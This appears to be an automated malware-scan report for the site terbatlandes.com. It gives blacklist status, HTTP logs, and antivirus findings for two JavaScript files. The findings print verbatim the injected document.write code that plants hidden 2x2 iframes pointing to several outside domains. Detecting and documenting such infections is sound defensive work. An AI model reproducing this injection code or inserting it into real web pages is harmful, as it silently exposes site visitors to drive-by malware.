Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=terbatlandes.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://terbatlandes.com/ | 200 OK Content-Length: 5496 Content-Type: text/html | clean |
http://terbatlandes.com/history/history.js | 200 OK Content-Length: 25940 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.lightdragoons.org/ahhs.html?j=1177142></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://baloncestocuellar.com/whci.html?j=1177142></iframe>'); BrowserHistoryUtils = { addEvent: function(elm, evType, fn, useCapture) { useCapture = useCapture || false;< } else if(e){ (function(){ var t=document.createElement('doc:rdy'); try{t.doScroll('left'); i();t=null; }catch(e){st(arguments.callee,0);}})(); } else{ window.onload=i; } })( function() {BrowserHistory.initialize();} ); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzws.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://www.lightdragoons.org/ahhs.html?j=1177142 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.lightdragoons.org/ahhs.html?j=1177142> Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzws.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzws.html> Hidden iFrame found. size: 2x2 src: http://baloncestocuellar.com/whci.html?j=1177142 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://baloncestocuellar.com/whci.html?j=1177142> | ||
http://terbatlandes.com/swfobject.js | 200 OK Content-Length: 26213 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.lightdragoons.org/ahhs.html?j=1177142></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://baloncestocuellar.com/whci.html?j=1177142></iframe>'); var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Fla if (storedCallbackFn) { storedCallbackFn(storedCallbackObj); } } isExpressInstallActive = false; } } }; }(); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzws.html></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://islam-news.ru/oczi.html?i=1177142></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzws.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzws.html> Hidden iFrame found. size: 2x2 src: http://baloncestocuellar.com/whci.html?j=1177142 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://baloncestocuellar.com/whci.html?j=1177142> Hidden iFrame found. size: 2x2 src: http://www.lightdragoons.org/ahhs.html?j=1177142 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.lightdragoons.org/ahhs.html?j=1177142> Hidden iFrame found. size: 2x2 src: http://islam-news.ru/oczi.html?i=1177142 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://islam-news.ru/oczi.html?i=1177142> | ||
http://terbatlandes.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: terbatlandes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 12 Oct 2014 02:14:34 GMT
Accept-Ranges: bytes
Server: Apache
Content-Language: fr
Content-Length: 5496
Content-Type: text/html
Last-Modified: Tue, 27 May 2014 18:30:31 GMT
...5496 bytes of data.
GET / HTTP/1.1
Host: terbatlandes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 12 Oct 2014 02:14:34 GMT
Accept-Ranges: bytes
Server: Apache
Content-Language: fr
Content-Length: 5496
Content-Type: text/html
Last-Modified: Tue, 27 May 2014 18:30:31 GMT
...5496 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: terbatlandes.com
Referer: http://www.google.com/search?q=terbatlandes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: terbatlandes.com
Referer: http://www.google.com/search?q=terbatlandes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.